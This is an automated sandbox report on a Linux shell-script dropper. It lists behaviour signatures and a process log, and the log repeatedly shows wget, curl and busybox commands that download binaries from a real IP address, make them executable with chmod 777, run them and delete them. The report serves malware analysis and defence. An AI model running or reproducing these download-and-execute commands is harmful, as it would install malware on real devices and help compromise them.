Malware Analysis Report

2025-04-03 19:34

Sample ID 241028-bgdfysxdlr
Target 1ac86a90ce63f5179c129c8cf2fda09b.bin
SHA256 a7b952c05dab9d1f3a9f1a8ad7f00550a6c560c865445326ffc3ff0ef0da13a2
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

a7b952c05dab9d1f3a9f1a8ad7f00550a6c560c865445326ffc3ff0ef0da13a2

Threat Level: Shows suspicious behavior

The file 1ac86a90ce63f5179c129c8cf2fda09b.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

Executes dropped EXE

File and Directory Permissions Modification

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-28 01:06

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-28 01:06

Reported

2024-10-28 01:09

Platform

debian9-mipsbe-20240611-en

Max time kernel

150s

Max time network

155s

Command Line

[/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP N/A
N/A /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK N/A
N/A /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 N/A
N/A /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F N/A
N/A /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp N/A
N/A /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 N/A
N/A /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 N/A
N/A /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir N/A
N/A /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C N/A
N/A /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 N/A
N/A /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 N/A
N/A /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD N/A
N/A /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d N/A
N/A /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF N/A
N/A /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD N/A
N/A /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d N/A
N/A /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF N/A
N/A /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP N/A
N/A /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK N/A
N/A /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 N/A
N/A /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir N/A
N/A /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C N/A
N/A /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 N/A
N/A /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 N/A
N/A /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F N/A
N/A /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp N/A
N/A /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /usr/bin/curl N/A
File opened for modification /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 /usr/bin/curl N/A
File opened for modification /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /usr/bin/curl N/A
File opened for modification /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /usr/bin/curl N/A
File opened for modification /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /usr/bin/curl N/A
File opened for modification /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /usr/bin/curl N/A
File opened for modification /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /usr/bin/curl N/A
File opened for modification /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /usr/bin/curl N/A
File opened for modification /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /usr/bin/curl N/A
File opened for modification /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /usr/bin/curl N/A
File opened for modification /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 /usr/bin/curl N/A
File opened for modification /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /usr/bin/curl N/A
File opened for modification /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /usr/bin/curl N/A
File opened for modification /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /usr/bin/curl N/A
File opened for modification /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /usr/bin/curl N/A
File opened for modification /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /usr/bin/curl N/A
File opened for modification /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /usr/bin/curl N/A
File opened for modification /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /usr/bin/curl N/A
File opened for modification /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /usr/bin/curl N/A
File opened for modification /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /usr/bin/curl N/A
File opened for modification /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /usr/bin/curl N/A
File opened for modification /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /usr/bin/curl N/A
File opened for modification /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /usr/bin/curl N/A
File opened for modification /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /usr/bin/curl N/A
File opened for modification /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /usr/bin/curl N/A
File opened for modification /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /usr/bin/curl N/A
File opened for modification /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 /usr/bin/curl N/A

Processes

/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh

[/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/chmod

[chmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP

[./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/rm

[rm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/usr/bin/wget

[wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/chmod

[chmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK

[./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/rm

[rm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/usr/bin/wget

[wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/chmod

[chmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4

[./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/rm

[rm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/usr/bin/wget

[wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/chmod

[chmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F

[./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/rm

[rm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/usr/bin/wget

[wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/chmod

[chmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp

[./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/rm

[rm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/usr/bin/wget

[wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/chmod

[chmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2

[./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/rm

[rm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/usr/bin/wget

[wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/bin/chmod

[chmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3

[./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/bin/rm

[rm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/usr/bin/wget

[wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/chmod

[chmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir

[./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/rm

[rm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/usr/bin/wget

[wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/chmod

[chmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C

[./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/rm

[rm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/usr/bin/wget

[wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/chmod

[chmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7

[./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/rm

[rm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/usr/bin/wget

[wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/bin/chmod

[chmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8

[./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/bin/rm

[rm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/usr/bin/wget

[wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/bin/chmod

[chmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD

[./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/bin/rm

[rm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/usr/bin/wget

[wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/bin/chmod

[chmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d

[./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/bin/rm

[rm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/usr/bin/wget

[wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/bin/chmod

[chmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF

[./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/bin/rm

[rm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/usr/bin/wget

[wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/bin/chmod

[chmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD

[./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/bin/rm

[rm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/usr/bin/wget

[wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/bin/chmod

[chmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d

[./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/bin/rm

[rm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/usr/bin/wget

[wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/bin/chmod

[chmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF

[./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/bin/rm

[rm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/usr/bin/wget

[wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/chmod

[chmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP

[./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/rm

[rm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/usr/bin/wget

[wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/chmod

[chmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK

[./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/rm

[rm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/usr/bin/wget

[wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/chmod

[chmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4

[./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/rm

[rm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/usr/bin/wget

[wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/chmod

[chmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir

[./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/rm

[rm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/usr/bin/wget

[wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/chmod

[chmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C

[./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/rm

[rm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/usr/bin/wget

[wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/chmod

[chmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7

[./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/rm

[rm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/usr/bin/wget

[wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/bin/chmod

[chmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8

[./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/bin/rm

[rm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/usr/bin/wget

[wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/busybox

